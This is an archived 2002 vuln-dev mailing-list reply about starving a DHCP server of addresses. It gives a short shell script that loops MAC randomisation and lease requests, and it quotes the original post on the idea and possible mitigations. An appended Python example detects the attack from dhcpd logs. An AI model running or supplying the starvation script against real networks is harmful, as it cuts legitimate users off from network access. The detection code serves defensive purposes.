Re: DoS against DHCP

From: Russell Handorf (rhandorf@mail.russells-world.com)
Date: 01/31/02


Date: Wed, 30 Jan 2002 18:34:35 -0500
To: RSnake <rsnake@shocking.com>, vuln-dev@securityfocus.com
From: Russell Handorf <rhandorf@mail.russells-world.com>


#!/bin/sh
counter=0
if [ $# -eq 0 ]
then
         echo "You're missing the argument of how many times for me to repeat."
         exit 1
fi
while [ $counter -le $1 ]
do
         ifconfig eth0 down
         ./changemac -r
         pump
         ifconfig eth0
         counter=`expr $counter + 1`
done
echo "done"

Contingent on you having changemac or some other way to randomize a new mac
addy.

russ

At 02:20 PM 1/30/2002 -0800, you wrote:

> I came up with this about a year back at DefCon, and told some friends
> in hopes that either they or I would do something with it, but none of us
> had time so here goes, and please feel free to write this yourself. DoS
> against DHCP:
>
> A DHCP server has only a certain amount of addresses available. If you (a
> single malicious machine connected to the network) actively take up all
> available IP addresses, and compete against the machines that are currently
> connected you should be able to completely take all available IP addresses
> and block access to the DHCP server. You could do this by opening many
> interfaces on a Linux box and asking for many DHCP addresses and lying that
> you connected before any competing machines (or DoS the competing machine
> directly until the DHCP server releases the IP address to you).
>
> This combined with war-driving could take down any DHCP IP address block
> within wireless range. Kinda nasty, but only effective as long as you stay
> connected to the network, so a compromised machine on the network might be
> necessary for extended DoS. Probably the way around this would be a) some
> sort of authentication to log into the DHCP server and/or b) using LEAP or
> something similar. MAC addresses are spoofable, so it probably wouldn't be a
> good idea to limit the number of times a particular MAC address connects to
> the network, as that would just be a sloppy obfuscation. DHCP has always
> seemed like a bad idea to me. Sorry if this seems obvious.

==================================
Russell Handorf
oooo, shiney ::Wanders after it::

www.russells-world.com
www.philly2600.net

"Computer games don't affect kids, I mean if Pacman affected us as kids,
we'd all be running around in darkened rooms, munching pills and listening
to repetitive music." ~unknown
==================================
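
Since a per-MAC limit does not help against spoofed addresses, as the quoted message notes, a DHCP server operator can instead watch the rate of first-time MACs per interface. The following is an added example, not part of either post: it assumes ISO timestamps and ISC-dhcpd-style DHCPDISCOVER messages, and the log lines, function names and thresholds are constructed for illustration.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Assumed log shape: ISO timestamp, then an ISC-dhcpd-style message.
DISCOVER = re.compile(
    r"^(\S+) dhcpd: DHCPDISCOVER from ((?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: \(\S+\))? via ([^\s:]+)(.*no free leases)?", re.I)

def build_sample():
    """Constructed log: two ordinary clients, then eight new MACs in 16 seconds."""
    lines = ["2002-01-30T18:00:00 dhcpd: DHCPDISCOVER from 00:a0:c9:11:22:33 via eth0",
             "2002-01-30T18:05:00 dhcpd: DHCPDISCOVER from 00:50:04:aa:bb:cc (laptop) via eth0"]
    start = datetime(2002, 1, 30, 18, 10, 0)
    for i in range(8):
        ts = (start + timedelta(seconds=2 * i)).isoformat()
        tail = ": network 192.168.1.0/24: no free leases" if i >= 6 else ""
        lines.append(f"{ts} dhcpd: DHCPDISCOVER from 02:00:5e:00:00:{i:02x} via eth0{tail}")
    # A known client retrying must not count as a new MAC.
    lines.append("2002-01-30T18:10:20 dhcpd: DHCPDISCOVER from 00:a0:c9:11:22:33 via eth0")
    return "\n".join(lines)

def find_starvation(log_text, window=timedelta(seconds=60), threshold=5):
    """Return (alerts, exhausted): alerts are (time, interface, new_mac_count) raised
    when an interface sees `threshold` first-time MACs within `window`."""
    seen, recent, alerts, exhausted = {}, {}, [], 0
    for line in log_text.splitlines():
        m = DISCOVER.match(line)
        if not m:
            continue
        ts, mac, iface = datetime.fromisoformat(m.group(1)), m.group(2).lower(), m.group(3)
        if m.group(4):
            exhausted += 1  # the server reported an empty pool
        known = seen.setdefault(iface, set())
        if mac in known:
            continue
        known.add(mac)
        q = recent.setdefault(iface, deque())
        q.append(ts)
        while ts - q[0] > window:  # drop first sightings older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts.append((ts, iface, len(q)))
    return alerts, exhausted

if __name__ == "__main__":
    for when, iface, count in find_starvation(build_sample())[0]:
        print(f"{when} {iface}: {count} first-time MACs inside the window")
```

The threshold and window need tuning per network: a lecture hall or conference Wi-Fi legitimately sees many new MACs at once, while a small office segment does not.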